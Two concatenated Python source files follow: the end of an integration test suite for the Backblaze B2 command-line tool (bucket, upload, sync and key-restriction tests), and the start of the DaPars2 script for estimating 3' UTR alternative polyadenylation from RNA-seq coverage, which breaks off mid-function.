class CommandLine(object):
PROGRESS_BAR_PATTERN = re.compile(r'.*B/s]$', re.DOTALL)
EXPECTED_STDERR_PATTERNS = [
PROGRESS_BAR_PATTERN,
re.compile(r'^$') # empty line
]
def __init__(self, path_to_script):
self.path_to_script = path_to_script
def run_command(self, args):
"""
Runs the command with the given arguments, returns a tuple in form of
(succeeded, stdout)
"""
status, stdout, stderr = run_command(self.path_to_script, args)
return status == 0 and stderr == '', stdout
def should_succeed(self, args, expected_pattern=None):
"""
Runs the command-line with the given arguments. Raises an exception
if there was an error; otherwise, returns the stdout of the command
        as a string.
"""
status, stdout, stderr = run_command(self.path_to_script, args)
if status != 0:
print('FAILED with status', status)
sys.exit(1)
if stderr != '':
failed = False
for line in (s.strip() for s in stderr.split(os.linesep)):
if not any(p.match(line) for p in self.EXPECTED_STDERR_PATTERNS):
print('Unexpected stderr line:', repr(line))
failed = True
if failed:
print('FAILED because of stderr')
print(stderr)
sys.exit(1)
if expected_pattern is not None:
if re.search(expected_pattern, stdout) is None:
print('STDOUT:')
print(stdout)
error_and_exit('did not match pattern: ' + expected_pattern)
return stdout
def should_succeed_json(self, args):
"""
Runs the command-line with the given arguments. Raises an exception
if there was an error; otherwise, treats the stdout as JSON and returns
the data in it.
"""
return json.loads(self.should_succeed(args))
def should_fail(self, args, expected_pattern):
"""
Runs the command-line with the given args, expecting the given pattern
to appear in stderr.
"""
status, stdout, stderr = run_command(self.path_to_script, args)
if status == 0:
print('ERROR: should have failed')
sys.exit(1)
if re.search(expected_pattern, stdout + stderr) is None:
print(expected_pattern)
print(stdout + stderr)
error_and_exit('did not match pattern: ' + expected_pattern)
def list_file_versions(self, bucket_name):
return self.should_succeed_json(['list_file_versions', bucket_name])['files']
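# Illustrative sketch (the bucket name is hypothetical, and this is not part of the
# test suite): typical use of the CommandLine wrapper defined above, after the
# account has been authorized.
def _example_command_line_usage():
    tool = CommandLine('b2')
    listing = tool.should_succeed(['list_buckets'])
    versions = tool.list_file_versions('my-bucket')
    return listing, versions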
class TestCommandLine(unittest.TestCase):
def test_stderr_patterns(self):
progress_bar_line = './b2: 0%| | 0.00/33.3K [00:00<?, ?B/s]\r./b2: 25%|\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8d | 8.19K/33.3K [00:00<00:01, 21.7KB/s]\r./b2: 33.3KB [00:02, 12.1KB/s]'
self.assertIsNotNone(CommandLine.PROGRESS_BAR_PATTERN.match(progress_bar_line))
progress_bar_line = '\r./b2: 0%| | 0.00/33.3K [00:00<?, ?B/s]\r./b2: 25%|\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8d | 8.19K/33.3K [00:00<00:01, 19.6KB/s]\r./b2: 33.3KB [00:02, 14.0KB/s]'
self.assertIsNotNone(CommandLine.PROGRESS_BAR_PATTERN.match(progress_bar_line))
def should_equal(expected, actual):
print(' expected:')
print_json_indented(expected)
print(' actual:')
print_json_indented(actual)
if expected != actual:
print(' ERROR')
sys.exit(1)
print()
def delete_files_in_bucket(b2_tool, bucket_name):
while True:
data = b2_tool.should_succeed_json(['list_file_versions', bucket_name])
files = data['files']
if len(files) == 0:
return
for file_info in files:
b2_tool.should_succeed(
['delete_file_version', file_info['fileName'], file_info['fileId']]
)
def clean_buckets(b2_tool, bucket_name_prefix):
"""
    Removes all buckets whose names start with the given prefix, deleting their file versions first.
In doing so, exercises list_buckets.
"""
text = b2_tool.should_succeed(['list_buckets'])
buckets = {}
for line in text.split(os.linesep)[:-1]:
words = line.split()
if len(words) != 3:
error_and_exit('bad list_buckets line: ' + line)
(b_id, b_type, b_name) = words
buckets[b_name] = b_id
for bucket_name in buckets:
if bucket_name.startswith(bucket_name_prefix):
delete_files_in_bucket(b2_tool, bucket_name)
b2_tool.should_succeed(['delete_bucket', bucket_name])
def setup_envvar_test(envvar_name, envvar_value):
"""
Establish config for environment variable test.
The envvar_value names the new credential file
Create an environment variable with the given value
Copy the B2 credential file (~/.b2_account_info) and rename the existing copy
Extract and return the account_id and application_key from the credential file
"""
src = os.path.expanduser('~/.b2_account_info')
dst = os.path.expanduser(envvar_value)
shutil.copyfile(src, dst)
shutil.move(src, src + '.bkup')
os.environ[envvar_name] = envvar_value
def tearDown_envvar_test(envvar_name):
"""
Clean up after running the environment variable test.
    Delete the new B2 credential file (the file named by the
    envvar_name environment variable).
Rename the backup of the original credential file back to
the standard name (~/.b2_account_info)
Delete the environment variable
"""
os.remove(os.environ.get(envvar_name))
fname = os.path.expanduser('~/.b2_account_info')
shutil.move(fname + '.bkup', fname)
if os.environ.get(envvar_name) is not None:
del os.environ[envvar_name]
def download_test(b2_tool, bucket_name):
file_to_upload = 'README.md'
uploaded_a = b2_tool.should_succeed_json(
['upload_file', '--noProgress', '--quiet', bucket_name, file_to_upload, 'a']
)
with TempDir() as dir_path:
p = lambda fname: os.path.join(dir_path, fname)
b2_tool.should_succeed(['download_file_by_name', '--noProgress', bucket_name, 'a', p('a')])
assert read_file(p('a')) == read_file(file_to_upload)
b2_tool.should_succeed(
['download_file_by_id', '--noProgress', uploaded_a['fileId'],
p('b')]
)
assert read_file(p('b')) == read_file(file_to_upload)
# there is just one file, so clean after itself for faster execution
b2_tool.should_succeed(['delete_file_version', uploaded_a['fileName'], uploaded_a['fileId']])
b2_tool.should_succeed(['delete_bucket', bucket_name])
return True
def basic_test(b2_tool, bucket_name):
file_to_upload = 'README.md'
file_mod_time_str = str(file_mod_time_millis(file_to_upload))
hex_sha1 = hashlib.sha1(read_file(file_to_upload)).hexdigest()
b2_tool.should_succeed(
['upload_file', '--noProgress', '--quiet', bucket_name, file_to_upload, 'a']
)
b2_tool.should_succeed(['upload_file', '--noProgress', bucket_name, file_to_upload, 'a'])
b2_tool.should_succeed(['upload_file', '--noProgress', bucket_name, file_to_upload, 'b/1'])
b2_tool.should_succeed(['upload_file', '--noProgress', bucket_name, file_to_upload, 'b/2'])
b2_tool.should_succeed(
[
'upload_file', '--noProgress', '--sha1', hex_sha1, '--info', 'foo=bar=baz', '--info',
'color=blue', bucket_name, file_to_upload, 'c'
]
)
b2_tool.should_fail(
[
'upload_file', '--noProgress', '--sha1', hex_sha1, '--info', 'foo-bar', '--info',
'color=blue', bucket_name, file_to_upload, 'c'
], r'ERROR: Bad file info: foo-bar'
)
b2_tool.should_succeed(
[
'upload_file', '--noProgress', '--contentType', 'text/plain', bucket_name,
file_to_upload, 'd'
]
)
b2_tool.should_succeed(
['download_file_by_name', '--noProgress', bucket_name, 'b/1', os.devnull]
)
b2_tool.should_succeed(['hide_file', bucket_name, 'c'])
list_of_files = b2_tool.should_succeed_json(['list_file_names', bucket_name])
should_equal(['a', 'b/1', 'b/2', 'd'], [f['fileName'] for f in list_of_files['files']])
list_of_files = b2_tool.should_succeed_json(['list_file_names', bucket_name, 'b/2'])
should_equal(['b/2', 'd'], [f['fileName'] for f in list_of_files['files']])
list_of_files = b2_tool.should_succeed_json(['list_file_names', bucket_name, 'b', '2'])
should_equal(['b/1', 'b/2'], [f['fileName'] for f in list_of_files['files']])
list_of_files = b2_tool.should_succeed_json(['list_file_versions', bucket_name])
should_equal(
['a', 'a', 'b/1', 'b/2', 'c', 'c', 'd'], [f['fileName'] for f in list_of_files['files']]
)
should_equal(
['upload', 'upload', 'upload', 'upload', 'hide', 'upload', 'upload'],
[f['action'] for f in list_of_files['files']]
)
first_c_version = list_of_files['files'][4]
second_c_version = list_of_files['files'][5]
list_of_files = b2_tool.should_succeed_json(['list_file_versions', bucket_name, 'c'])
should_equal(['c', 'c', 'd'], [f['fileName'] for f in list_of_files['files']])
list_of_files = b2_tool.should_succeed_json(
['list_file_versions', bucket_name, 'c', second_c_version['fileId']]
)
should_equal(['c', 'd'], [f['fileName'] for f in list_of_files['files']])
list_of_files = b2_tool.should_succeed_json(
['list_file_versions', bucket_name, 'c', second_c_version['fileId'], '1']
)
should_equal(['c'], [f['fileName'] for f in list_of_files['files']])
b2_tool.should_succeed(['ls', bucket_name], '^a{0}b/{0}d{0}'.format(os.linesep))
b2_tool.should_succeed(
['ls', '--long', bucket_name],
'^4_z.*upload.*a{0}.*-.*b/{0}4_z.*upload.*d{0}'.format(os.linesep)
)
b2_tool.should_succeed(
['ls', '--versions', bucket_name], '^a{0}a{0}b/{0}c{0}c{0}d{0}'.format(os.linesep)
)
b2_tool.should_succeed(['ls', bucket_name, 'b'], '^b/1{0}b/2{0}'.format(os.linesep))
b2_tool.should_succeed(['ls', bucket_name, 'b/'], '^b/1{0}b/2{0}'.format(os.linesep))
file_info = b2_tool.should_succeed_json(['get_file_info', second_c_version['fileId']])
expected_info = {
'color': 'blue',
'foo': 'bar=baz',
'src_last_modified_millis': file_mod_time_str
}
should_equal(expected_info, file_info['fileInfo'])
b2_tool.should_succeed(['delete_file_version', 'c', first_c_version['fileId']])
b2_tool.should_succeed(['ls', bucket_name], '^a{0}b/{0}c{0}d{0}'.format(os.linesep))
b2_tool.should_succeed(['make_url', second_c_version['fileId']])
def key_restrictions_test(b2_tool, bucket_name):
second_bucket_name = 'test-b2-command-line-' + random_hex(8)
b2_tool.should_succeed(['create-bucket', second_bucket_name, 'allPublic'],)
key_one_name = 'clt-testKey-01' + random_hex(6)
created_key_stdout = b2_tool.should_succeed(
[
'create-key',
key_one_name,
'listFiles,listBuckets,readFiles,writeKeys',
]
)
key_one_id, key_one = created_key_stdout.split()
b2_tool.should_succeed(['authorize_account', key_one_id, key_one],)
b2_tool.should_succeed(['get-bucket', bucket_name],)
b2_tool.should_succeed(['get-bucket', second_bucket_name],)
key_two_name = 'clt-testKey-02' + random_hex(6)
created_key_two_stdout = b2_tool.should_succeed(
[
'create-key',
'--bucket',
bucket_name,
key_two_name,
'listFiles,listBuckets,readFiles',
]
)
key_two_id, key_two = created_key_two_stdout.split()
b2_tool.should_succeed(['authorize_account', key_two_id, key_two],)
b2_tool.should_succeed(['get-bucket', bucket_name],)
b2_tool.should_succeed(['list-file-names', bucket_name],)
failed_bucket_err = r'ERROR: Application key is restricted to bucket: ' + bucket_name
b2_tool.should_fail(['get-bucket', second_bucket_name], failed_bucket_err)
failed_list_files_err = r'ERROR: Application key is restricted to bucket: ' + bucket_name
b2_tool.should_fail(['list-file-names', second_bucket_name], failed_list_files_err)
# reauthorize with more capabilities for clean up
b2_tool.should_succeed(['authorize_account', sys.argv[1], sys.argv[2]])
b2_tool.should_succeed(['delete-bucket', second_bucket_name])
b2_tool.should_succeed(['delete-key', key_one_id])
b2_tool.should_succeed(['delete-key', key_two_id])
def account_test(b2_tool, bucket_name):
    # this is really a high-level operations test - bucket create/update is exercised here because this test does not otherwise use its bucket
b2_tool.should_succeed(['delete_bucket', bucket_name])
new_bucket_name = bucket_name[:-8] + random_hex(
8
) # apparently server behaves erratically when we delete a bucket and recreate it right away
b2_tool.should_succeed(['create_bucket', new_bucket_name, 'allPrivate'])
b2_tool.should_succeed(['update_bucket', new_bucket_name, 'allPublic'])
new_creds = os.path.join(tempfile.gettempdir(), 'b2_account_info')
setup_envvar_test('B2_ACCOUNT_INFO', new_creds)
b2_tool.should_succeed(['clear_account'])
bad_application_key = sys.argv[2][:-8] + ''.join(reversed(sys.argv[2][-8:]))
b2_tool.should_fail(['authorize_account', sys.argv[1], bad_application_key], r'unauthorized')
b2_tool.should_succeed(['authorize_account', sys.argv[1], sys.argv[2]])
tearDown_envvar_test('B2_ACCOUNT_INFO')
def file_version_summary(list_of_files):
"""
Given the result of list_file_versions, returns a list
of all file versions, with "+" for upload and "-" for
hide, looking like this:
['+ photos/a.jpg', '- photos/b.jpg', '+ photos/c.jpg']
"""
return [('+ ' if (f['action'] == 'upload') else '- ') + f['fileName'] for f in list_of_files]
def find_file_id(list_of_files, file_name):
for file in list_of_files:
if file['fileName'] == file_name:
return file['fileId']
assert False, 'file not found: %s' % (file_name,)
def sync_up_test(b2_tool, bucket_name):
_sync_test_using_dir(b2_tool, bucket_name, 'sync')
def sync_test_no_prefix(b2_tool, bucket_name):
_sync_test_using_dir(b2_tool, bucket_name, '')
def _sync_test_using_dir(b2_tool, bucket_name, dir_):
sync_point_parts = [bucket_name]
if dir_:
sync_point_parts.append(dir_)
prefix = dir_ + '/'
else:
prefix = ''
b2_sync_point = 'b2:' + '/'.join(sync_point_parts)
with TempDir() as dir_path:
p = lambda fname: os.path.join(dir_path, fname)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal([], file_version_summary(file_versions))
write_file(p('a'), b'hello')
write_file(p('b'), b'hello')
write_file(p('c'), b'hello')
# simulate action (nothing should be uploaded)
b2_tool.should_succeed(['sync', '--noProgress', '--dryRun', dir_path, b2_sync_point])
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal([], file_version_summary(file_versions))
os.symlink('broken', p('d'))
# now upload
b2_tool.should_succeed(
['sync', '--noProgress', dir_path, b2_sync_point],
expected_pattern="d could not be accessed"
)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(
[
'+ ' + prefix + 'a',
'+ ' + prefix + 'b',
'+ ' + prefix + 'c',
], file_version_summary(file_versions)
)
c_id = find_file_id(file_versions, prefix + 'c')
file_info = b2_tool.should_succeed_json(['get_file_info', c_id])['fileInfo']
should_equal(file_mod_time_millis(p('c')), int(file_info['src_last_modified_millis']))
os.unlink(p('b'))
write_file(p('c'), b'hello world')
b2_tool.should_succeed(
['sync', '--noProgress', '--keepDays', '10', dir_path, b2_sync_point]
)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(
[
'+ ' + prefix + 'a',
'- ' + prefix + 'b',
'+ ' + prefix + 'b',
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
], file_version_summary(file_versions)
)
os.unlink(p('a'))
b2_tool.should_succeed(['sync', '--noProgress', '--delete', dir_path, b2_sync_point])
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal([
'+ ' + prefix + 'c',
], file_version_summary(file_versions))
#test --compareThreshold with file size
write_file(p('c'), b'hello world!')
#should not upload new version of c
b2_tool.should_succeed(
[
'sync', '--noProgress', '--keepDays', '10', '--compareVersions', 'size',
'--compareThreshold', '1', dir_path, b2_sync_point
]
)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal([
'+ ' + prefix + 'c',
], file_version_summary(file_versions))
#should upload new version of c
b2_tool.should_succeed(
[
'sync', '--noProgress', '--keepDays', '10', '--compareVersions', 'size', dir_path,
b2_sync_point
]
)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(
[
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
], file_version_summary(file_versions)
)
set_file_mod_time_millis(p('c'), file_mod_time_millis(p('c')) + 2000)
#test --compareThreshold with modTime
#should not upload new version of c
b2_tool.should_succeed(
[
'sync', '--noProgress', '--keepDays', '10', '--compareVersions', 'modTime',
'--compareThreshold', '2000', dir_path, b2_sync_point
]
)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(
[
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
], file_version_summary(file_versions)
)
#should upload new version of c
b2_tool.should_succeed(
[
'sync', '--noProgress', '--keepDays', '10', '--compareVersions', 'modTime',
dir_path, b2_sync_point
]
)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(
[
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
], file_version_summary(file_versions)
)
# confirm symlink is skipped
write_file(p('linktarget'), b'hello')
os.symlink('linktarget', p('alink'))
b2_tool.should_succeed(
['sync', '--noProgress', '--excludeAllSymlinks', dir_path, b2_sync_point],
)
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(
[
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
'+ ' + prefix + 'linktarget',
],
file_version_summary(file_versions),
)
# confirm symlink target is uploaded (with symlink's name)
b2_tool.should_succeed(['sync', '--noProgress', dir_path, b2_sync_point])
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(
[
'+ ' + prefix + 'alink',
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
'+ ' + prefix + 'c',
'+ ' + prefix + 'linktarget',
],
file_version_summary(file_versions),
)
def sync_down_test(b2_tool, bucket_name):
sync_down_helper(b2_tool, bucket_name, 'sync')
def sync_down_helper(b2_tool, bucket_name, folder_in_bucket):
file_to_upload = 'README.md'
b2_sync_point = 'b2:%s' % bucket_name
if folder_in_bucket:
b2_sync_point += '/' + folder_in_bucket
b2_file_prefix = folder_in_bucket + '/'
else:
b2_file_prefix = ''
with TempDir() as local_path:
# Sync from an empty "folder" as a source.
b2_tool.should_succeed(['sync', b2_sync_point, local_path])
should_equal([], sorted(os.listdir(local_path)))
# Put a couple files in B2, and sync them down
b2_tool.should_succeed(
['upload_file', '--noProgress', bucket_name, file_to_upload, b2_file_prefix + 'a']
)
b2_tool.should_succeed(
['upload_file', '--noProgress', bucket_name, file_to_upload, b2_file_prefix + 'b']
)
b2_tool.should_succeed(['sync', b2_sync_point, local_path])
should_equal(['a', 'b'], sorted(os.listdir(local_path)))
def sync_long_path_test(b2_tool, bucket_name):
"""
test sync with very long path (overcome windows 260 character limit)
"""
b2_sync_point = 'b2://' + bucket_name
long_path = '/'.join(
(
'extremely_long_path_which_exceeds_windows_unfortunate_260_character_path_limit',
'and_needs_special_prefixes_containing_backslashes_added_to_overcome_this_limitation',
'when_doing_so_beware_leaning_toothpick_syndrome_as_it_can_cause_frustration',
'see_also_xkcd_1638'
)
)
with TempDir() as dir_path:
local_long_path = os.path.normpath(os.path.join(dir_path, long_path))
fixed_local_long_path = fix_windows_path_limit(local_long_path)
os.makedirs(os.path.dirname(fixed_local_long_path))
write_file(fixed_local_long_path, b'asdf')
b2_tool.should_succeed(['sync', '--noProgress', '--delete', dir_path, b2_sync_point])
file_versions = b2_tool.list_file_versions(bucket_name)
should_equal(['+ ' + long_path], file_version_summary(file_versions))
def main():
if len(sys.argv) < 3:
usage_and_exit()
path_to_script = 'b2'
account_id = sys.argv[1]
application_key = sys.argv[2]
defer_cleanup = True
test_map = {
'account': account_test,
'basic': basic_test,
'keys': key_restrictions_test,
'sync_down': sync_down_test,
'sync_up': sync_up_test,
'sync_up_no_prefix': sync_test_no_prefix,
'sync_long_path': sync_long_path_test,
'download': download_test,
}
if len(sys.argv) >= 4:
tests_to_run = sys.argv[3:]
for test_name in tests_to_run:
if test_name not in test_map:
error_and_exit('unknown test: "%s"' % (test_name,))
else:
tests_to_run = sorted(six.iterkeys(test_map))
if os.environ.get('B2_ACCOUNT_INFO') is not None:
del os.environ['B2_ACCOUNT_INFO']
b2_tool = CommandLine(path_to_script)
global_dirty = False
# Run each of the tests in its own empty bucket
for test_name in tests_to_run:
print('#')
print('# Cleaning and making bucket for:', test_name)
print('#')
print()
b2_tool.should_succeed(['clear_account'])
b2_tool.should_succeed(['authorize_account', account_id, application_key])
bucket_name_prefix = 'test-b2-command-line-' + account_id
if not defer_cleanup:
clean_buckets(b2_tool, bucket_name_prefix)
bucket_name = bucket_name_prefix + '-' + random_hex(8)
success, _ = b2_tool.run_command(['create_bucket', bucket_name, 'allPublic'])
if not success:
clean_buckets(b2_tool, bucket_name_prefix)
b2_tool.should_succeed(['create_bucket', bucket_name, 'allPublic'])
print('#')
print('# Running test:', test_name)
print('#')
print()
test_fcn = test_map[test_name]
dirty = not test_fcn(b2_tool, bucket_name)
global_dirty = global_dirty or dirty
if global_dirty:
print('#' * 70)
print('#')
print('# The last test was run, cleaning up')
print('#')
print('#' * 70)
print()
clean_buckets(b2_tool, bucket_name_prefix)
print()
print("ALL OK")
if __name__ == '__main__':
if sys.argv[1:] == ['test']:
del sys.argv[1]
unittest.main()
else:
main()
|
Dapars2_Multi_Sample.py
|
import numpy as np
import os
import sys
import datetime
import threading
import scipy as sp
import scipy.stats
from multiprocessing import Pool
from bisect import bisect
import math
import time
import multiprocessing
def time_now():#return time
curr_time = datetime.datetime.now()
return curr_time.strftime("%c")
def Convert_wig_into_bp_coverage(extracted_coverage,extracted_3UTR_region,strand_info):
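    # Worked example (illustrative values): with extracted_3UTR_region = [100, 103, 105]
    # and extracted_coverage = [2, 5], the loop below expands the interval coverage into
    # per-base-pair coverage [2, 2, 2, 5, 5]; for strand_info == '-' the array is then
    # reversed to [5, 5, 2, 2, 2] so the coverage runs along the transcript direction.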
bp_coverage = np.zeros(extracted_3UTR_region[-1] - extracted_3UTR_region[0])
relative_start = extracted_3UTR_region[0]
for i in range(len(extracted_coverage)):
curr_region_start = extracted_3UTR_region[i] - relative_start
curr_region_end = extracted_3UTR_region[i+1] - relative_start
bp_coverage[curr_region_start:curr_region_end] = extracted_coverage[i]
if strand_info == '-':
bp_coverage = bp_coverage[::-1]
return bp_coverage
def parse_cfgfile(cfg_file):
'''Parse configure file
'''
Aligned_Wig_files=''
output_directory=''
Annotated_3UTR_file=''
Output_result_file=''
Coverage_threshold = 1
Num_threads = 1
sequencing_depth_file = ''
for line in open(cfg_file, 'r'):
if line[0] == '\n' or line[0] == '#':
comments = line;
else:
line = line.rstrip()
command = line.split('=');
if command[0] == 'Aligned_Wig_files':
Aligned_Wig_files = command[1].split(',');
if command[0] == 'Output_directory':
output_directory = command[1]
if output_directory[-1] != '/':
output_directory += '/'
if command[0] == 'Annotated_3UTR':
Annotated_3UTR_file = command[1]
if command[0] == 'Output_result_file':
Output_result_file = command[1]
if command[0] == 'sequencing_depth_file':
sequencing_depth_file = command[1]
if command[0] == 'Num_Threads':
Num_threads = int(command[1])
if command[0] == 'Coverage_threshold':
Coverage_threshold = int(command[1])
if Aligned_Wig_files == '':
print >> sys.stderr, "No aligned BAM file found!"
exit(1)
if output_directory=='':
print >> sys.stderr, "No output directory!"
exit(1)
if Annotated_3UTR_file=='':
print >> sys.stderr, "No annotated 3' UTR file!"
exit(1)
if Output_result_file=='':
print >> sys.stderr, "No result file name!"
exit(1)
if sequencing_depth_file=='':
print >> sys.stderr, "No sequencing depth file!"
exit(1)
return Aligned_Wig_files, output_directory, Annotated_3UTR_file, Output_result_file, sequencing_depth_file, Num_threads, Coverage_threshold
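# Example configuration file accepted by parse_cfgfile above (the key names come from
# the parser; all values are hypothetical):
#
#   Aligned_Wig_files=sample1.wig,sample2.wig
#   Output_directory=DaPars2_output/
#   Annotated_3UTR=annotated_3UTR.bed
#   Output_result_file=DaPars2
#   sequencing_depth_file=mapping_depth.txt
#   Num_Threads=4
#   Coverage_threshold=10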
def load_sequencing_depth(depth_file):
seq_depth_list = []
for line in open(depth_file, 'r'):
fields = line.strip('\n').split('\t')
seq_depth_list.append(int(fields[-1]))
return np.array(seq_depth_list)
def De_Novo_3UTR_Identification_Loading_Target_Wig_for_TCGA_Multiple_Samples_Multiple_threads_Main3_shared_list(argv=None):
'''multiple threads version
'''
if len(sys.argv) == 1:
print "Please provide the configure file and specify chr name..."
exit(1)
global no_chr_prefix
cfg_file = sys.argv[1]
curr_processing_chr = sys.argv[2]
no_chr_prefix = "F"
if len(sys.argv) > 3 and sys.argv[3] in ["T","F"]:
no_chr_prefix = sys.argv[3]
print >> sys.stderr, "[%s] Start Analysis ..." % time_now()
Group1_Tophat_aligned_file, output_directory, Annotated_3UTR_file, Output_result_file, sequencing_depth_file, Num_threads, Coverage_threshold = parse_cfgfile(cfg_file)
All_Sample_files = Group1_Tophat_aligned_file[:]
Sample_name = []
for sample in All_Sample_files:
sample_name = sample.rsplit('.',1)[0]
Sample_name.append(sample_name)
##Prepare output directory
output_directory = output_directory.strip('/') + '_' + curr_processing_chr + '/'
d = os.path.dirname(output_directory)
if not os.path.exists(d):
os.makedirs(d)
temp_dir = d + '/tmp/'
if not os.path.exists(temp_dir):
os.makedirs(temp_dir)
Output_all_prediction_file = output_directory + Output_result_file + '_result_temp.' + curr_processing_chr + '.txt'
Output_result = open(Output_all_prediction_file, 'w')
num_samples = len(All_Sample_files)
print >> sys.stderr, "All samples Joint Processing %s ..." % curr_processing_chr
print >> sys.stderr, "[%s] Loading Coverage ..." % time_now()
All_samples_Target_3UTR_coverages, UTR_events_dict = Load_Target_Wig_files_Multiple_threads_shared_dict_sampleid_key(All_Sample_files, Annotated_3UTR_file, Num_threads,curr_processing_chr)
All_samples_sequencing_depths = load_sequencing_depth(sequencing_depth_file)
print All_samples_sequencing_depths
All_sample_coverage_weights = All_samples_sequencing_depths/np.mean(All_samples_sequencing_depths)
#print All_sample_coverage_weights
print >> sys.stderr, "[%s] Loading Coverage Finished ..." % time_now()
#Write the first line
first_line = ['Gene','fit_value','Predicted_Proximal_APA','Loci']
for i in range(num_samples):
#curr_long_exp = 'Sample_%s_long_exp' % str(i+1)
#curr_short_exp = 'Sample_%s_short_exp' % str(i+1)
curr_ratio = '%s_PDUI' % str(Sample_name[i])
#first_line.extend([curr_long_exp,curr_short_exp,curr_ratio])
first_line.append(curr_ratio)
Output_result.writelines('\t'.join(first_line) + '\n')
All_events_ids = UTR_events_dict.keys()
num_threads = Num_threads
Assigned_events_ids_all_threads = Assign_to_different_processor_balance_events(All_events_ids, num_threads)
num_real_threads = len(Assigned_events_ids_all_threads)
Output_each_processor_all = []
for i in range(num_real_threads):
curr_temp_output = temp_dir + 'Each_processor_3UTR_Result_%s.txt' % (str(i+1))
Output_each_processor_all.append(curr_temp_output)
processes = []
for i in range(num_real_threads):
process = multiprocessing.Process(target=Each_Thread_3UTR_estimation_list_version_sample_ids, args=(Assigned_events_ids_all_threads[i], UTR_events_dict, All_sample_coverage_weights, num_samples, Output_each_processor_all[i], All_samples_Target_3UTR_coverages, Coverage_threshold))
process.start()
processes.append(process)
for p in processes:
p.join()
#Combine results
for i in range(num_real_threads):
curr_result = Output_each_processor_all[i]
for line in open(curr_result, 'r'):
Output_result.writelines(line)
Output_result.close()
#print >> sys.stderr, "[%s] Filtering the Results ..." % time_now()
#Output_all_filtered_prediction_file = output_directory + Output_result_file + '_results_final.' + curr_processing_chr + '.txt'
#Dapars_Filtering(Output_all_prediction_file, num_samples, Output_all_filtered_prediction_file)
print >> sys.stderr, "[%s] Finished!" % time_now()
def Each_Thread_3UTR_estimation_list_version_sample_ids(curr_thread_UTR_events_ids, UTR_events_dict, All_sample_coverage_weights, num_samples, Output_result_file, All_samples_coverage_shared_dict, Coverage_threshold):
Output_result = open(Output_result_file,'w')
for curr_3UTR_id in curr_thread_UTR_events_ids:
curr_3UTR_structure = UTR_events_dict[curr_3UTR_id]
region_start = curr_3UTR_structure[1]
region_end = curr_3UTR_structure[2]
curr_strand = curr_3UTR_structure[-2]
UTR_pos = curr_3UTR_structure[-1]
curr_3UTR_all_samples_bp_coverage = []
for i in range(num_samples):
curr_sample_curr_3UTR_coverage_wig = All_samples_coverage_shared_dict[curr_3UTR_id, i]
curr_3UTR_curr_sample_bp_coverage = Convert_wig_into_bp_coverage(curr_sample_curr_3UTR_coverage_wig[0], curr_sample_curr_3UTR_coverage_wig[1], curr_strand)
curr_3UTR_all_samples_bp_coverage.append(curr_3UTR_curr_sample_bp_coverage)
select_mean_squared_error, selected_break_point, UTR_abundances = De_Novo_3UTR_Coverage_estimation_Genome_for_multiple_samples(curr_3UTR_all_samples_bp_coverage, region_start, region_end,curr_strand,All_sample_coverage_weights, Coverage_threshold)
if str(select_mean_squared_error) != "Na":
num_non_zero = 1
if num_non_zero > 0:
All_long_inclusion_ratios = []
line_write = [curr_3UTR_id, "%.1f" % select_mean_squared_error, str(selected_break_point), UTR_pos]
for i in range(num_samples):
if UTR_abundances[0][i] != 'NA':
# long 3'UTR percentage
curr_sample_ratio = float(UTR_abundances[0][i])/(float(UTR_abundances[0][i]) + float(UTR_abundances[1][i]))
All_long_inclusion_ratios.append(curr_sample_ratio)
#line_write.append("%.2f" % UTR_abundances[0][i])#long 3' UTR abundance
#line_write.append("%.2f" % UTR_abundances[1][i])#short 3' UTR abundance
line_write.append("%.2f" % curr_sample_ratio)
else:
line_write.extend(['NA']*1)
Output_result.writelines( '\t'.join(line_write) + '\n')
Output_result.close()
def De_Novo_3UTR_Coverage_estimation_Genome_for_multiple_samples(All_Samples_curr_3UTR_coverages, UTR_start, UTR_end, curr_strand, weight_for_second_coverage, Coverage_threshold):
coverage_threshold = Coverage_threshold
search_point_start = 150 ##200
search_point_end = int(abs((UTR_end - UTR_start))*0.05)
num_samples = len(All_Samples_curr_3UTR_coverages)
#Read Coverage
Region_Coverages = []
Pass_threshold_index = []
for i in range(num_samples):
curr_Region_Coverage_raw = All_Samples_curr_3UTR_coverages[i]
curr_Region_Coverage = curr_Region_Coverage_raw/weight_for_second_coverage[i]
curr_first_100_coverage = np.mean(curr_Region_Coverage_raw[0:99])
if curr_first_100_coverage > coverage_threshold:
Pass_threshold_index.append(i)
Region_Coverages.append(curr_Region_Coverage)
least_pass_coverage_num = num_samples * least_pass_coverage_percentage
if len(Pass_threshold_index) > least_pass_coverage_num and UTR_end - UTR_start >=150:
if curr_strand == "+":
search_region = range(UTR_start+search_point_start, UTR_end-search_point_end+1)
else:
search_region = range(UTR_end - search_point_start, UTR_start+search_point_end-1, -1)
search_region_start = search_point_start
search_region_end = UTR_end - UTR_start - search_point_end
Mean_squared_error_list = []
Estimated_3UTR_abundance_list = []
for curr_point in range(search_region_start, search_region_end+1):
curr_search_point = curr_point
All_samples_result = [[],[],[]]
for curr_sample_region_coverage in Region_Coverages:
Mean_Squared_error, Long_UTR_abun, Short_UTR_abun = Estimation_abundance(curr_sample_region_coverage, curr_search_point)
All_samples_result[0].append(Mean_Squared_error)
All_samples_result[1].append(Long_UTR_abun)
All_samples_result[2].append(Short_UTR_abun)
Mean_Squared_error = np.mean(np.array(All_samples_result[0]))
Mean_squared_error_list.append(Mean_Squared_error)
Estimated_3UTR_abundance_list.append([All_samples_result[1],All_samples_result[2]])
if len(Mean_squared_error_list) > 1:
min_ele_index = Mean_squared_error_list.index(min(Mean_squared_error_list))
